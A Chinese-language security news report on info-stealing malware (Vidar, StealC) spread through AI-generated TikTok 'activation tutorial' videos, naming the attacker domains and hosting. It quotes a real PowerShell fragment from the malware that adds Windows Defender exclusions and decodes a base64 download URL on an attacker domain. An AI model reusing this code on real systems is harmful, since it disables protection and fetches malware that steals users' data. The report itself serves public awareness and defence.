摘要:网络犯罪分子已开始利用人工智能技术,在TikTok平台发起复杂的社交工程攻击。他们通过AI生成的教程视频传播危险的信息窃取恶意软件,目前该平台已有数十万用户受到影响。
网络犯罪分子已开始利用人工智能技术,在TikTok平台发起复杂的社交工程攻击。他们通过AI生成的教程视频传播危险的信息窃取恶意软件,目前该平台已有数十万用户受到影响。
Part01AI视频伪装软件教程
攻击者利用TikTok庞大的用户基础,创建看似合法的AI生成视频,专门针对那些试图破解盗版软件的用户。这些伪装成软件激活教程的欺骗性视频,实际上诱导用户执行恶意PowerShell命令,悄无声息地在设备上安装Vidar和StealC等恶意软件变种。安全研究人员发现,部分恶意视频观看量已接近50万次,这表明TikTok全球用户社区可能面临大规模入侵风险。这种攻击方式代表了社交工程策略的重大演变,将AI生成内容的说服力与社交媒体平台的信任环境相结合。与传统依赖电子邮件附件或可疑下载的恶意软件传播方式不同,此次攻击利用了用户对视频教程的天然信任,使得普通用户极难识别威胁。Part02复杂的基础设施网络
Censys分析团队指出,该攻击活动的基础设施显示出精心设计的运作模式,使用多个专门用于规避检测的域名和IP地址。研究人员进一步发现了一个庞大的恶意基础设施网络,包括amssh.co、allaivo.me和winbox.ws等域名,这些域名都托管在名为AS214196的防弹托管服务提供商上。该提供商宣传提供"快速、安全且匿名的虚拟服务器,无需KYC(了解你的客户)认证"。基于PowerShell的感染机制该恶意软件采用复杂的PowerShell脚本实现多重规避和持久化技术。当受害者执行攻击者提供的命令时,恶意软件会启动一个多阶段的有效载荷投递系统,旨在绕过Windows Defender并建立长期系统访问权限。
`function Add-Exclusion { param([string]$Path) try { Add-MpPreference -ExclusionPath $Path -ErrorAction SilentlyContinue } catch {} } $downloadUrl = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("YWxsYWl2by5tZS9jcnlwdGVkLmV4ZQ=="))`
该脚本首先禁用Windows Defender对特定目录的监控,然后从解码后的URL下载主有效载荷。恶意软件通过在系统文件夹中创建隐藏目录,并将自身安装为受信任的Windows Update服务来建立持久性,确保即使在系统重启后仍能继续运行,同时保持低调以避免被安全软件检测到。参考来源:
Hackers Drop Info-Stealing Malware On TikTok Users Device Using AI-Generated Videos来源:FreeBuf